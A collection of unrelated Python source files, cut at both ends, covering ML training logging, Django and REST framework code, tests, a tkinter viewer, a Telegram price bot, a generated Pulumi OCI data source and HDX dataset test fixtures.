# Track the epoch associated with the current training iteration.
@trainer.on(Events.ITERATION_STARTED(every=args.log_interval))
def log_epoch(engine: Engine):
wandb_logger.log({"epoch": engine.state.epoch}, step=engine.state.iteration, commit=False)
@trainer.on(CustomEvents.EXAMPLE_PREDICTIONS_READY)
def log_example_predictions(engine: Engine):
for tag, (x, y, y_pred) in engine.state.examples.items():
x, y, y_pred = x.numpy(), y.numpy(), y_pred.numpy()
# Convert log scale (torch.log_softmax) predictions.
y_pred = np.exp(y_pred)
# Prepare images for plotting.
moments = engine.state.dataloader.dataset.moments
x = x.transpose(0, 2, 3, 1) # NCHW -> NHWC
x = x * moments["std"] + moments["mean"] # Denormalize using dataset moments
x = x.clip(0, 1)
# Plot grid of predictions for "example" batch.
idx_to_class = {v: k for k, v in engine.state.dataloader.dataset.class_to_idx.items()}
image = prediction_grid(x, y, y_pred, idx_to_class)
# Save the prediction grid both to file system and W&B.
wandb_logger.log({f"{tag}/examples": wandb_logger.Image(image)}, step=engine.state.iteration)
def prediction_grid(x: np.ndarray, y: np.ndarray, y_pred: np.ndarray, idx_to_class: dict):
max_images = min(32, x.shape[0])
num_cols = min(8, max_images)
num_rows = max(1, ceil(max_images / num_cols))
fig, axs = plt.subplots(
num_rows,
num_cols,
dpi=300,
constrained_layout=True,
gridspec_kw={
"hspace": 0,
"wspace": 0,
},
subplot_kw={
"frame_on": False,
"xticks": [],
"yticks": [],
},
)
for ax, image, label, scores in zip(axs.flat, x, y, y_pred):
ax.imshow(image)
# Encode labels and softmax scores in subplot title.
prediction = np.argmax(scores)
text = "{} {:.4f} ({})".format(idx_to_class[prediction], scores[prediction], idx_to_class[label])
ax.set_title(text, {
"color": "green" if prediction == label else "red",
"fontsize": 2.5,
})
fig_image = render_figure(fig)
plt.close(fig)
return fig_image
def render_figure(fig: plt.Figure):
canvas = FigureCanvasAgg(fig)
canvas.draw()
image = np.array(canvas.buffer_rgba())
return image
def grab_shuffled_data(dataloader: DataLoader, batch_size: int, args: Namespace):
dataloader = DataLoader(dataloader.dataset, batch_size=batch_size, shuffle=True)
batch = next(iter(dataloader))
return batch
def trainer_transform(x, y, y_pred, loss):
return {"x": x, "y": y, "y_pred": y_pred, "loss": loss.item()}
def evaluator_transform(x, y, y_pred):
return {"x": x, "y": y, "y_pred": y_pred}
def metric_transform(output):
return output["y_pred"], output["y"]
def parse_args():
parser = ArgumentParser()
parser.add_argument("--data-dir", type=Path, metavar="PATH", required=True, help="path to partitioned data directory")
parser.add_argument("--output-dir", type=Path, metavar="PATH", required=True, help="path to output directory")
parser.add_argument("--device", type=torch.device, metavar="NAME", default="cuda", help="device to use for model training")
parser.add_argument("--num-workers", type=int, metavar="NUM", default=2, help="number of workers to use for data loaders")
parser.add_argument("--max-epochs", type=int, metavar="NUM", default=25, help="maximum number of epochs to train")
parser.add_argument("--dev-mode", action="store_true", help="run each model phase with only one batch")
return parser.parse_args()
if __name__ == "__main__":
_args = parse_args()
main(_args)
|
# Generated by Django 2.1.5 on 2020-01-04 12:04
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('robot', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='appmodel',
name='bind_user',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='robot.WxUser'),
),
migrations.AddField(
model_name='wxgroup',
name='insert_time',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='wxgroup',
name='update_time',
field=models.DateTimeField(auto_now=True),
),
migrations.AddField(
model_name='wxuser',
name='insert_time',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AddField(
model_name='wxuser',
name='update_time',
field=models.DateTimeField(auto_now=True),
),
]
|
from rest_framework import viewsets
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework.authentication import SessionAuthentication
from rest_framework.permissions import IsAuthenticated
from . import serializers as serializers
from . import models as models
class LaboratoryViewSet(viewsets.ModelViewSet):
authentication_classes = (JWTAuthentication, SessionAuthentication,)
permission_classes = (IsAuthenticated,)
serializer_class = serializers.LaboratorySerializer
def get_queryset(self):
return models.Laboratory \
.objects \
.filter(users=self.request.user) \
.order_by('-created')
def perform_create(self, serializer):
laboratory = serializer.save()
laboratory.users.add(self.request.user) |
import pytest
from uuid import UUID
from zeus import factories
from zeus.db.utils import create_or_update, try_create
# we use the User model to test
from zeus.models import User
def test_try_create_only_where_new_instance():
instance = try_create(User, {"email": "foo@example.com"})
assert instance
assert instance.email == "foo@example.com"
def test_try_create_with_defaults_new_instance():
instance = try_create(
User,
{"id": UUID("5edb7312-316e-11ea-b6cd-8c85906d3733")},
{"email": "foo@example.com"},
)
assert instance
assert instance.id == UUID("5edb7312-316e-11ea-b6cd-8c85906d3733")
assert instance.email == "foo@example.com"
@pytest.mark.xfail
def test_try_create_only_where_existing_instance(default_user):
instance = try_create(User, {"email": default_user.email})
assert not instance
@pytest.mark.xfail
def test_try_create_with_defaults_existing_instance(default_user):
instance = try_create(
User, {"id": default_user.id}, {"email": "defnotreal@example.com"}
)
assert not instance
def test_create_or_update_new_instance(db_session):
another_user = factories.UserFactory.create()
instance, created = create_or_update(User, {"email": "defnotreal@example.com"})
assert created
assert instance.email == "defnotreal@example.com"
db_session.refresh(another_user)
assert another_user.email != "defnotreal@example.com"
@pytest.mark.xfail
def test_create_or_update_existing_instance(db_session, default_user):
another_user = factories.UserFactory.create()
instance, created = create_or_update(
User, {"id": default_user.id}, {"email": "defnotreal@example.com"}
)
assert not created
assert instance.email == "defnotreal@example.com"
db_session.refresh(another_user)
assert another_user.email != "defnotreal@example.com"
|
#!/usr/bin/env python3
""""Provide a tkinter text box class for file viewing.
Copyright (c) 2022 Peter Triesberger
For further information see https://github.com/peter88213/yw-viewer
Published under the MIT License (https://opensource.org/licenses/mit-license.php)
"""
import re
import tkinter as tk
from ywviewerlib.rich_text_tk import RichTextTk
class FileViewer:
"""A tkinter text box class for yWriter file viewing.
Public methods:
view_text(taggedText) -- load tagged text into the text box.
build_views() -- create tagged text for quick viewing.
reset_view() -- clear the text box.
Public instance variables:
prjDescription -- list of tuples: Project description.
chapterTitles -- list of tuples: List of chapter titles.
chapterDescriptions -- list of tuples: Text containing chapter titles and descriptions.
sceneTitles -- list of tuples: Text containing chapter titles and listed scene titles.
sceneDescriptions -- list of tuples: Text containing chapter titles and scene descriptions.
sceneContents -- list of tuples: Text containing chapter titles and scene contents.
Show titles, descriptions, and contents in a text box.
"""
def __init__(self, ui):
"""Put a text box to the GUI main window.
Positional arguments:
title -- application title to be displayed at the window frame.
Required keyword arguments:
yw_last_open -- str: initial file.
Extends the superclass constructor.
"""
self._ui = ui
self._textBox = RichTextTk(self._ui.viewerWindow, height=20, width=60, spacing1=10, spacing2=2, wrap='word', padx=40)
self._textBox.pack(expand=True, fill='both')
self.prjDescription = []
self.chapterTitles = []
self.chapterDescriptions = []
self.sceneTitles = []
self.sceneDescriptions = []
self.sceneContents = []
def view_text(self, taggedText):
"""Load tagged text into the text box.
Positional arguments:
taggedText -- list of (text, formatting tag) tuples.
Disable text editing.
"""
self._textBox['state'] = 'normal'
self._textBox.delete('1.0', tk.END)
for text, tag in taggedText:
self._textBox.insert(tk.END, text, tag)
self._textBox['state'] = 'disabled'
def build_views(self):
"""Create tagged text for quick viewing.
Return a string containing the total numbers of chapters, scenes and words.
"""
def convert_from_yw(text):
"""Remove yw7 markup from text."""
return re.sub('\[\/*[i|b|h|c|r|s|u]\d*\]', '', text)
# Get project description.
self.prjDescription = []
if self._ui.ywPrj.desc:
self.prjDescription.append((self._ui.ywPrj.desc, ''))
else:
self.prjDescription.append(('(No project description available)', 'italic'))
self.chapterTitles = []
self.chapterDescriptions = []
self.sceneTitles = []
self.sceneDescriptions = []
self.sceneContents = []
chapterCount = 0
sceneCount = 0
wordCount = 0
for chId in self._ui.ywPrj.srtChapters:
if self._ui.ywPrj.chapters[chId].isUnused:
continue
if self._ui.ywPrj.chapters[chId].chType != 0 and self._ui.ywPrj.chapters[chId].oldType != 0:
continue
chapterCount += 1
if self._ui.ywPrj.chapters[chId].chLevel == 0:
headingTag = RichTextTk.H2_TAG
listTag = ''
else:
headingTag = RichTextTk.H1_TAG
listTag = RichTextTk.BOLD_TAG
# Get chapter titles.
if self._ui.ywPrj.chapters[chId].title:
self.chapterTitles.append((f'{self._ui.ywPrj.chapters[chId].title}\n', listTag))
sceneHeading = (f'{self._ui.ywPrj.chapters[chId].title}\n', headingTag)
self.sceneTitles.append(sceneHeading)
# Get chapter descriptions.
if self._ui.ywPrj.chapters[chId].desc:
self.chapterDescriptions.append((f'{self._ui.ywPrj.chapters[chId].title}\n', headingTag))
self.chapterDescriptions.append((f'{self._ui.ywPrj.chapters[chId].desc}\n', ''))
for scId in self._ui.ywPrj.chapters[chId].srtScenes:
if not (self._ui.ywPrj.scenes[scId].isUnused or self._ui.ywPrj.scenes[scId].isNotesScene or self._ui.ywPrj.scenes[scId].isTodoScene):
sceneCount += 1
# Get scene titles.
if self._ui.ywPrj.scenes[scId].title:
self.sceneTitles.append((f'{self._ui.ywPrj.scenes[scId].title}\n', ''))
# Get scene descriptions.
if self._ui.ywPrj.scenes[scId].desc:
self.sceneDescriptions.append(sceneHeading)
self.sceneDescriptions.append((f'{self._ui.ywPrj.scenes[scId].desc}\n', ''))
# Get scene contents.
if self._ui.ywPrj.scenes[scId].sceneContent:
self.sceneContents.append(sceneHeading)
self.sceneContents.append((convert_from_yw(f'{self._ui.ywPrj.scenes[scId].sceneContent}\n'), ''))
sceneHeading = ('* * *\n', RichTextTk.CENTER_TAG)
# Get scene word count.
if self._ui.ywPrj.scenes[scId].wordCount:
wordCount += self._ui.ywPrj.scenes[scId].wordCount
if not self.chapterTitles:
self.chapterTitles.append(('(No chapter titles available)', RichTextTk.ITALIC_TAG))
if not self.chapterDescriptions:
self.chapterDescriptions.append(('(No chapter descriptions available)', RichTextTk.ITALIC_TAG))
if not self.sceneTitles:
self.sceneTitles.append(('(No scene titles available)', RichTextTk.ITALIC_TAG))
if not self.sceneDescriptions:
self.sceneDescriptions.append(('(No scene descriptions available)', RichTextTk.ITALIC_TAG))
if not self.sceneContents:
self.sceneContents.append(('(No scene contents available)', RichTextTk.ITALIC_TAG))
return f'{chapterCount} chapters, {sceneCount} scenes, {wordCount} words'
def reset_view(self):
"""Clear the text box."""
self._textBox['state'] = 'normal'
self._textBox.delete('1.0', tk.END)
self._textBox['state'] = 'disabled'
|
from siptrackdlib import errors
from siptrackdlib import log
class ObjectClass(object):
"""A class definition in the object registry.
Stores a reference to the class itself and also a list of valid child
classes (class_ids).
"""
def __init__(self, class_reference):
self.class_reference = class_reference
self.valid_children = {}
def registerChild(self, class_reference):
"""Register a class as a valid child class."""
self.valid_children[class_reference.class_id] = None
class ObjectRegistry(object):
"""Keeps track of registered classes and their valid children.
The object registry is used to keep track of valid classes and
what classes are valid children of a class.
It also allocates object ids and can be used to create new objects
based on the registry.
"""
def __init__(self):
self.object_classes = {}
self.object_classes_by_name = {}
self.next_oid = 0
def registerClass(self, class_reference):
"""Register a new class.
This creates a new ObjectClass and stores it in the registry,
enabling creation of objects of the given class.
The returned ObjectClass object can be used to register valid
children of the class.
"""
object_class = ObjectClass(class_reference)
self.object_classes[class_reference.class_id] = \
object_class
self.object_classes_by_name[class_reference.class_name] = \
object_class
return object_class
def isValidChild(self, parent_id, child_id):
"""Check if a class is a valid child of another class."""
if not parent_id in self.object_classes:
return False
parent = self.object_classes[parent_id]
if child_id not in parent.valid_children:
return False
return True
def getClass(self, class_name):
"""Returns the class reference for class registered with class_name."""
if class_name in self.object_classes_by_name:
return self.object_classes_by_name[class_name].class_reference
return None
def getClassById(self, class_id):
"""Returns the class reference for class registered with class_name."""
if class_id in self.object_classes:
return self.object_classes[class_id].class_reference
return None
def getIDByName(self, class_name):
"""Return a classes id given it's name."""
if class_name in self.object_classes_by_name:
object_class = self.object_classes_by_name[class_name]
return object_class.class_reference.class_id
return None
def allocateOID(self):
"""Allocate a new oid."""
ret = str(self.next_oid)
self.next_oid += 1
return ret
def revertOID(self):
"""Revert an oid allocation."""
self.next_oid -= 1
def createObject(self, class_id, parent_branch, *args, **kwargs):
"""Try to create a new object based on a registered class.
This will try to create a new object of 'class_id' type, allocating
it it's own oid. A new branch will also be created in the object
tree to hold the object.
"""
if class_id not in self.object_classes:
raise errors.SiptrackError(
'trying to create object with invalid class id \'%s\'' % (class_id))
object_class = self.object_classes[class_id]
oid = self.allocateOID()
branch = parent_branch.add(oid)
try:
obj = object_class.class_reference(oid, branch, *args, **kwargs)
except Exception as e:
branch.remove(recursive = False, callback_data = None)
self.revertOID()
raise
branch.ext_data = obj
return obj
def _createObject(self, class_id, branch):
"""Try to create _only_ a new object based on an oid and class id.
Similar to createObject, but takes a class id and an oid and only
creates a new object, no branch etc.
"""
if class_id not in self.object_classes:
raise errors.SiptrackError(
'trying to create object with invalid class id \'%s\'' % (class_id))
object_class = self.object_classes[class_id]
obj = object_class.class_reference(branch.oid, branch)
return obj
object_registry = ObjectRegistry()
|
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from . import views
router = DefaultRouter(trailing_slash=True)
router.register('seekers', views.SeekerViewSet, base_name='seeker')
router.register('employers', views.EmployerViewSet, base_name='employer')
urlpatterns = [
path('api-auth/', include('rest_framework.urls')),
# Oauth2 endpoints
path('o/token/', views.ProfileTokenView.as_view(), name="token"),
path('o/', include('oauth2_provider.urls', namespace='oauth2_provider')),
# Signup and profile info
path('signup/seeker/', views.signup_seeker, name='signup_seeker'),
path('signup/employer/', views.signup_employer, name='signup_employer'),
path('me/', views.me, name='me'),
# view sets
path('', include(router.urls)),
]
|
# K-Means Clustering
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('cars.csv')
X = dataset.iloc[:,:-1].values
X = pd.DataFrame(X)
X = X.convert_objects(convert_numeric=True)
X.columns = ['mpg', ' cylinders', ' cubicinches', ' hp', ' weightlbs', ' time-to-60', 'year']
X = pd.DataFrame(X)
X = X.convert_objects(convert_numeric=True)
X.columns = ['mpg', ' cylinders', ' cubicinches', ' hp', ' weightlbs', ' time-to-60', 'year']
# Eliminating null values
for i in X.columns:
X[i] = X[i].fillna(int(X[i].mean()))
for i in X.columns:
print(X[i].isnull().sum())
# Using the dendogram to find the optimum number of clusters
import scipy.cluster.hierarchy as sch
dendrogram = sch.dendrogram(sch.linkage(X,method='ward'))
plt.title('Dendrogram')
plt.xlabel('Customers')
plt.ylabel('Euclidean Distances')
plt.show()
# Fitting hierarchical clustering to the dataset
from sklearn.cluster import AgglomerativeClustering
hc = AgglomerativeClustering(n_clusters=3,affinity='euclidean',linkage='ward')
y_hc = hc.fit_predict(X)
X = X.as_matrix(columns=None)
# Visualising the clusters
plt.scatter(X[y_hc == 0, 0], X[y_hc == 0,1],s=100,c='red',label='US')
plt.scatter(X[y_hc == 1, 0], X[y_hc == 1,1],s=100,c='blue',label='Japan')
plt.scatter(X[y_hc == 2, 0], X[y_hc == 2,1],s=100,c='green',label='Europe')
plt.title('Clusters of car brands')
plt.legend()
plt.show() |
import telebot
import os
import requests
import threading
from flask import Flask, request
from emoji import emojize
# set up config variables en your heroku environment
# your bot TOKEN
token = os.environ.get('TOKEN')
# your heroku app URL and add path "bot" for active update
appURL = os.environ.get('APPURL') + '/bot'
# your chatID of your channel
chatID = os.environ.get('CHATID')
# end of read config variables
bot = telebot.TeleBot(token)
server = Flask(__name__)
def requestAPI():
url = "https://api.coinmarketcap.com/v1/ticker/bitcoin"
response = requests.get(url)
name = response.json()[0]['name']
price = response.json()[0]['price_usd']
# 24 hours price change with emoji
rate24h = response.json()[0]['percent_change_24h']
if float(rate24h) > 20:
rate24hemoji = emojize(":rocket:", use_aliases=True)
elif float(rate24h) < 0:
rate24hemoji = emojize(":small_red_triangle_down:", use_aliases=True)
elif float(rate24h) > 0:
rate24hemoji = emojize(":white_check_mark:", use_aliases=True)
# 7 days price change with emoji
rate7d = response.json()[0]['percent_change_7d']
if float(rate7d) > 20:
rate7demoji = emojize(":rocket:", use_aliases=True)
elif float(rate7d) < 0:
rate7demoji = emojize(":small_red_triangle_down:", use_aliases=True)
elif float(rate7d) > 0:
rate7demoji = emojize(":white_check_mark:", use_aliases=True)
text = "Current *" + name + "* price - *${}".format(price) + "*" \
+ "\nLast 24hours changed for *" + rate24h + "%*" + rate24hemoji \
+ "\nLast 7days changed for *" + rate7d + "%*" + rate7demoji
bot.send_message(chatID, text, parse_mode="Markdown")
# time period each 3600 seconds = 1 hour
threading.Timer(3600, requestAPI).start()
requestAPI()
@server.route("/bot", methods=['POST'])
def getMessage():
bot.process_new_updates([telebot.types.Update.de_json(request.stream.read().decode("utf-8"))])
return "!", 200
@server.route("/")
def webhook():
bot.remove_webhook()
bot.set_webhook(url=appURL)
return "!", 200
server.run(host="0.0.0.0", port=int(os.environ.get('PORT', 5000)))
server = Flask(__name__) |
#!/usr/bin/env python2
import sys
def unstuff(x, start, size):
return (x >> start) & (2**size - 1)
def main(name, args):
if len(args) != 1:
print "Syntax: %s <card>" % (name, )
print "Example: %s mmcblk0" % (name, )
return 100
card = args[0]
dev = "/sys/class/block/%s/device/csd" % (card, )
csd = int(file(dev).read(), 16)
write_block_size = 2**unstuff(csd,22,4)
erase_block_size = write_block_size*(unstuff(csd,39,7)+1)
print "Erase block size of %s is %d bytes." % (card, erase_block_size)
sys.exit(main(sys.argv[0], sys.argv[1:]))
|
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils import timezone
@python_2_unicode_compatible # only if you need to support Python 2
class signals(models.Model):
Date = models.DateField()
Close = models.FloatField()
ewma_10 = models.FloatField()
ewma_20 = models.FloatField()
ewma_50 = models.FloatField()
ewma_100 = models.FloatField()
var = models.FloatField()
mean = models.FloatField()
cv = models.FloatField()
BBG = models.CharField(max_length=12)
lastUpdate = models.DateTimeField()
def __str__(self):
return '%s %s %s' % (self.BBG, self.lastUpdate, self.Close)
@python_2_unicode_compatible # only if you need to support Python 2
class calendar(models.Model):
date = models.DateField()
cdr = models.CharField(max_length=2)
def __str__(self):
return '%s %s' % (self.cdr, self.date)
@python_2_unicode_compatible # only if you need to support Python 2
class batch_run(models.Model):
BBG = models.CharField(max_length=12)
CDR = models.CharField(max_length=12)
web_source = models.CharField(max_length=12, null=True, blank=True)
IDX = models.CharField(max_length=12)
isWorking = models.BooleanField()
mnemo = models.CharField(max_length=12, null=True, blank=True)
def __str__(self):
return '%s %s %s %s %s' % (self.CDR, self.BBG, self.web_source, self.IDX, self.isWorking)
|
# -*- coding: utf-8 -*-
from pickle import load
import pkg_resources
TAGGER_PATH = pkg_resources.resource_filename(__name__, 'POS_TAGGER.pkl')
with open(TAGGER_PATH, 'rb') as f:
TAGGER = load(f)
def get_POS_tagged_sent(sentence):
"""
Params:
sentence should be a list of tokens, including punctuation.
"""
return TAGGER.tag_sents([sentence])[0]
def main():
ret = get_POS_tagged_sent(['I', 'go', 'to', 'school', '.'])
print(ret)
if __name__ == '__main__':
main() |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = [
'GetModelsResult',
'AwaitableGetModelsResult',
'get_models',
]
@pulumi.output_type
class GetModelsResult:
"""
A collection of values returned by getModels.
"""
def __init__(__self__, compartment_id=None, display_name=None, filters=None, id=None, model_collections=None, project_id=None, state=None):
if compartment_id and not isinstance(compartment_id, str):
raise TypeError("Expected argument 'compartment_id' to be a str")
pulumi.set(__self__, "compartment_id", compartment_id)
if display_name and not isinstance(display_name, str):
raise TypeError("Expected argument 'display_name' to be a str")
pulumi.set(__self__, "display_name", display_name)
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if model_collections and not isinstance(model_collections, list):
raise TypeError("Expected argument 'model_collections' to be a list")
pulumi.set(__self__, "model_collections", model_collections)
if project_id and not isinstance(project_id, str):
raise TypeError("Expected argument 'project_id' to be a str")
pulumi.set(__self__, "project_id", project_id)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> str:
"""
The OCID for the model's compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[str]:
"""
A user-friendly display name for the resource. It does not have to be unique and can be modified. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def filters(self) -> Optional[Sequence['outputs.GetModelsFilterResult']]:
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
The provider-assigned unique ID for this managed resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="modelCollections")
def model_collections(self) -> Sequence['outputs.GetModelsModelCollectionResult']:
"""
The list of model_collection.
"""
return pulumi.get(self, "model_collections")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the project to associate with the model.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> Optional[str]:
"""
The state of the model.
"""
return pulumi.get(self, "state")
class AwaitableGetModelsResult(GetModelsResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetModelsResult(
compartment_id=self.compartment_id,
display_name=self.display_name,
filters=self.filters,
id=self.id,
model_collections=self.model_collections,
project_id=self.project_id,
state=self.state)
def get_models(compartment_id: Optional[str] = None,
display_name: Optional[str] = None,
filters: Optional[Sequence[pulumi.InputType['GetModelsFilterArgs']]] = None,
project_id: Optional[str] = None,
state: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetModelsResult:
"""
This data source provides the list of Models in Oracle Cloud Infrastructure Ai Anomaly Detection service.
Returns a list of Models.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_models = oci.aianomalydetection.get_models(compartment_id=var["compartment_id"],
display_name=var["model_display_name"],
project_id=oci_ai_anomaly_detection_project["test_project"]["id"],
state=var["model_state"])
```
:param str compartment_id: The ID of the compartment in which to list resources.
:param str display_name: A filter to return only resources that match the entire display name given.
:param str project_id: The ID of the project for which to list the objects.
:param str state: <b>Filter</b> results by the specified lifecycle state. Must be a valid state for the resource type.
"""
__args__ = dict()
__args__['compartmentId'] = compartment_id
__args__['displayName'] = display_name
__args__['filters'] = filters
__args__['projectId'] = project_id
__args__['state'] = state
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('oci:aianomalydetection/getModels:getModels', __args__, opts=opts, typ=GetModelsResult).value
return AwaitableGetModelsResult(
compartment_id=__ret__.compartment_id,
display_name=__ret__.display_name,
filters=__ret__.filters,
id=__ret__.id,
model_collections=__ret__.model_collections,
project_id=__ret__.project_id,
state=__ret__.state)
|
#GitHub.com/tanujdey7
try:
name = input("Enter Name")
print(name)
except KeyboardInterrupt:
print("error")
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Unit tests for DHS
"""
import copy
from os.path import join
import pytest
from hdx.data.dataset import Dataset
from hdx.data.vocabulary import Vocabulary
from hdx.hdx_configuration import Configuration
from hdx.hdx_locations import Locations
from hdx.location.country import Country
from hdx.utilities.compare import assert_files_same
from hdx.utilities.dictandlist import read_list_from_csv
from hdx.utilities.downloader import DownloadError
from hdx.utilities.path import temp_dir
from dhs import generate_datasets_and_showcase, get_countries, get_tags, get_publication, generate_resource_view
class TestDHS():
countrydata = {'UNAIDS_CountryCode': 'AFG', 'SubregionName': 'South Asia', 'WHO_CountryCode': 'AF', 'FIPS_CountryCode': 'AF', 'ISO2_CountryCode': 'AF', 'ISO3_CountryCode': 'AFG', 'RegionOrder': 41, 'DHS_CountryCode': 'AF', 'CountryName': 'Afghanistan', 'UNICEF_CountryCode': 'AFG', 'UNSTAT_CountryCode': 'AFG', 'RegionName': 'South & Southeast Asia'}
country = {'iso3': 'AFG', 'dhscode': 'AF'}
tags = [{'TagType': 2, 'TagName': 'DHS Quickstats', 'TagID': 0, 'TagOrder': 0}, {'TagType': 2, 'TagName': 'DHS Mobile', 'TagID': 77, 'TagOrder': 1}]
publications = [{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR186/SR186.pdf', 'PublicationTitle': 'Mortality Survey Key Findings 2009', 'SurveyId': 'AF2009OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR186.jpg', 'SurveyYear': 2009, 'PublicationSize': 2189233, 'DHS_CountryCode': 'AF', 'PublicationId': 11072, 'PublicationDescription': 'Afghanistan AMS 2009 Summary Report'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR186/SR186.pdf', 'PublicationTitle': 'Mortality Survey Key Findings', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR186.jpg', 'SurveyYear': 2010, 'PublicationSize': 2189233, 'DHS_CountryCode': 'AF', 'PublicationId': 1107, 'PublicationDescription': 'Afghanistan AMS 2010 Summary Report'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR248/FR248.pdf', 'PublicationTitle': 'Mortality Survey Final Report', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR248.jpg', 'SurveyYear': 2010, 'PublicationSize': 3457803, 'DHS_CountryCode': 'AF', 'PublicationId': 1106, 'PublicationDescription': 'Afghanistan Mortality Survey 2010'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/OF35/OF35.C.pdf', 'PublicationTitle': 'Afghanistan DHS 2014 - 8 Regional Fact Sheets', 'SurveyId': 'AF2014DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/OF35.jpg', 'SurveyYear': 2014, 'PublicationSize': 926663, 'DHS_CountryCode': 'AF', 'PublicationId': 17482, 'PublicationDescription': 'Afghanistan DHS 2014 - Capital Region Fact Sheet'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/SR236/SR236.pdf', 'PublicationTitle': 'Key Findings', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/SR236.jpg', 'SurveyYear': 2015, 'PublicationSize': 3605432, 'DHS_CountryCode': 'AF', 'PublicationId': 1714, 'PublicationDescription': 'Afghanistan DHS 2015 - Key Findings'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/OF35/OF35.C.pdf', 'PublicationTitle': 'Afghanistan DHS 2015 - 8 Regional Fact Sheets', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/OF35.jpg', 'SurveyYear': 2015, 'PublicationSize': 926663, 'DHS_CountryCode': 'AF', 'PublicationId': 1748, 'PublicationDescription': 'Afghanistan DHS 2015 - Capital Region Fact Sheet'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR248/FR248.pdf', 'PublicationTitle': 'Mortality Survey Final Report2', 'SurveyId': 'AF2010OTH', 'SurveyType': 'OTH', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR248.jpg', 'SurveyYear': 2010, 'PublicationSize': 3457803, 'DHS_CountryCode': 'AF', 'PublicationId': 11062, 'PublicationDescription': 'Afghanistan Mortality Survey 2010'},
{'PublicationURL': 'https://www.dhsprogram.com/pubs/pdf/FR323/FR323.pdf', 'PublicationTitle': 'Final Report', 'SurveyId': 'AF2015DHS', 'SurveyType': 'DHS', 'ThumbnailURL': 'https://www.dhsprogram.com/publications/images/thumbnails/FR323.jpg', 'SurveyYear': 2015, 'PublicationSize': 10756438, 'DHS_CountryCode': 'AF', 'PublicationId': 1713, 'PublicationDescription': 'Afghanistan Demographic and Health Survey 2015'}]
dataset = {'name': 'dhs-data-for-afghanistan', 'title': 'Afghanistan - National Demographic and Health Data',
'notes': 'Contains data from the [DHS data portal](https://api.dhsprogram.com/). There is also a dataset containing [Afghanistan - Subnational Demographic and Health Data](https://feature-data.humdata.org/dataset/dhs-subnational-data-for-afghanistan) on HDX.\n\nThe DHS Program Application Programming Interface (API) provides software developers access to aggregated indicator data from The Demographic and Health Surveys (DHS) Program. The API can be used to create various applications to help analyze, visualize, explore and disseminate data on population, health, HIV, and nutrition from more than 90 countries.',
'maintainer': '196196be-6037-4488-8b71-d786adf4c081', 'owner_org': '45e7c1a1-196f-40a5-a715-9d6e934a7f70',
'data_update_frequency': '365', 'subnational': '0', 'groups': [{'name': 'afg'}],
'tags': [{'name': 'hxl', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
{'name': 'health', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'},
{'name': 'demographics', 'vocabulary_id': '4e61d464-4943-4e97-973a-84673c1aaa87'}],
'dataset_date': '01/01/2015-12/31/2015'}
